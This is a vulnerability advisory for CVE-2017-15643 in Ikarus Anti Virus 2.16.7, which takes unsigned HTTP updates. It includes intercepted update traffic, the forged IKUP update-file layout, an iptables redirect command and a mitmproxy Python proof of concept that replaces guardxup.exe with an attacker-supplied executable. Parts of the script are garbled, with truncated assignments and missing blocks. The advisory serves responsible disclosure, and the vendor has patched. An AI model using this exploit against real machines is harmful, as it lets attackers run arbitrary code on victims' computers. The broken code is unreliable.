SSD Advisory – Ikraus Anti Virus Remote Code Execution

Vulnerability summary
The following advisory describes an remote code execution found in Ikraus Anti Virus version 2.16.7.
KARUS anti.virus “secures your personal data and PC from all kinds of malware. Additionally, the Anti-SPAM module protects you from SPAM and malware from e-mails. Prevent intrusion and protect yourself against cyber-criminals by choosing IKARUS anti.virus, powered by the award-winning IKARUS scan.engine. It is among the best in the world, detecting new and existing threats every day. ”
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor Response
Update 1
CVE: CVE-2017-15643
The vendor has released patches to address these vulnerabilities.
For more information:

Vulnerability details
An active network attacker (MiTM) can achieve remote code execution on a machine that runs Ikraus Anti Virus.
Ikarus AV for windows uses cleartext HTTP for updates along with a CRC32 checksum and an update value for verification of the downloaded files.
Also ikarus checks for a update version number which can be incremented to goad the process to update.
The update process executable in ikarus called guardxup.exe
guardxup.exe, send over port 80, the following request for update:

GET /cgi-bin/ HTTP/1.1
Accept: */*
User-Agent: virusutilities(6.1,0,1005047)
Connection: close

The server will respond with:

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2016 04:51:05 GMT
Server: Apache/2.4.10 (Debian) mod_perl/2.0.9dev Perl/v5.20.2
Content-Disposition: inline; filename=virusutilities
Content-Length: 306
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
	antispam_w64	001000076
	antispam	001000076
	update	001005047
	virusutilities	002013019
	t3modul_w64	002001016
	t3modul	002001016
	sdb	000007074
	t3sigs	000098727

Through the proxy we will modify the response and add 1 to the ‘update’ value and forward the response to the client.
Then the client will request the update via this url:
The ikarus server will respond with a 404:

HTTP/1.1 404 Not Found
Server: nginx/1.6.2
Date: Sun, 23 Oct 2016 04:53:05 GMT
Content-Type: text/html
Content-Length: 168
Connection: close
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>

But we will modify the response with a IKUP format:

Bytes: 0x0 - 0x3 == IKUP # header
Bytes: 0x4 - 0x7 == 0x0s
Bytes: 0x8 == 0x3C # pointer to start of PE EXE MZ header
Bytes: 0x20 - 0x23 == update value in little endian (script fixes it up)
Bytes: 0x24 - 0x27 == crc32 checksum (script populates from provided binary)
Bytes: 0x28 -> pointer to MZ header == 0x0s
Bytes: 'pointer to MZ header' -> ? == appended exe

Then we will forward to the update to the client, where it replaces guardxup.exe with our executable.
Proof of concept
Please install mitmproxy 0.17 – pip install mitmproxy==0.17
To use this script, you’ll need to MITM port 80 traffic from the client for use with a transparent proxy.
Set your firewall rules to intercept 80 traffic on port 8080:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

and execute the script as follows:
“`./ file_to_deploy.exe“`

#!/usr/bin/env python2
import os
    from mitmproxy import controller, proxy, platform
    from mitmproxy.proxy.server import ProxyServer
    from libmproxy import controller, proxy, platform
    from libmproxy.proxy.server import ProxyServer
import re
import struct
import sys
import zlib
import bz2
class IkarusPOC(controller.Master):
    def __init__(self, server, backdoored_file):
        controller.Master.__init__(self, server)
        self.ikarus= {}
        self.crc_file = 0
        self.backdoored_file = backdoored_file
        self.to_replace = 0
        self.already_patched = 0
        self.update_number = 0
    def win_header(self):
        self.update_header = "\x49\x4B\x55\x50\x00\x00\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00"
        self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        self.update_header += struct.pack("<I", self.to_replace)        # update number
        self.update_header += struct.pack("<I", self.crc_file)          # checksum
        self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        self.update_header += "\x00\x00\x00\x00"
    def run(self):
        except KeyboardInterrupt:
    def crc_stream(self, a_string):
        prev = 0
        return zlib.crc32(a_string, prev) & 0xFFFFFFFF
    def crc(self, some_file):
        prev = 0
        for eachLine in open(some_file,"rb"):
            prev = zlib.crc32(eachLine, prev)
        self.crc_file = prev & 0xFFFFFFFF
        print "[*] crc_file", self.crc_file
    def handle_request(self, flow):
        hid = (, flow.request.port)
    def handle_response(self, flow):
        print "[*]",
        if "cgi-bin/" in flow.request.path and "Dalvik" in flow.request.headers['User-Agent'] and self.already_patched <=2:
            content = flow.reply.obj.response.content
            p = re.compile("antispam[\s|\t].*\n")
            result =
            the_result =
            original_update_number= [int(s) for s in the_result.split() if s.isdigit()][0]
            if self.update_number == 0:
                self.update_number = original_update_number
            self.to_replace = self.update_number + 1
            content = content.replace(str(original_update_number), str(self.to_replace))
            flow.reply.obj.response.content = content
        if "cgi-bin/" in flow.request.path and 'virusutilities' in flow.request.headers['User-Agent'] and self.already_patched <= 2:
	    print "[*] Found update response, modifying..."
            content = flow.reply.obj.response.content
            p = re.compile("update[\s|\t].*\n")
            result =
            the_result =
            original_update_number = [int(s) for s in the_result.split() if s.isdigit()][0]
            if self.update_number == 0:
                self.update_number = original_update_number
            self.to_replace = self.update_number + 1
            print '[*] Update_number', self.update_number
            print '[*] Replace number', self.to_replace
            content = content.replace(str(original_update_number), str(self.to_replace))
            print "[*] Updated content", content
            flow.reply.obj.response.content = content
        if 'guard' in flow.request.path and 'full' in flow.request.path and self.already_patched <= 2:
            print '[*] Found guardxup.exe request! Modifying request and pushing provided file!'
            with open(self.backdoored_file, 'rb') as f:
                file_out  =
            content = self.update_header + file_out
            with open('/tmp/update_test.full', 'wb') as f:
            flow.reply.obj.response.content = content
            flow.reply.obj.response.status_code = 200
            self.already_patched += 1
config = proxy.ProxyConfig(port=8080, mode='transparent')
server = ProxyServer(config)
m = IkarusPOC(server, sys.argv[1])


Get in touch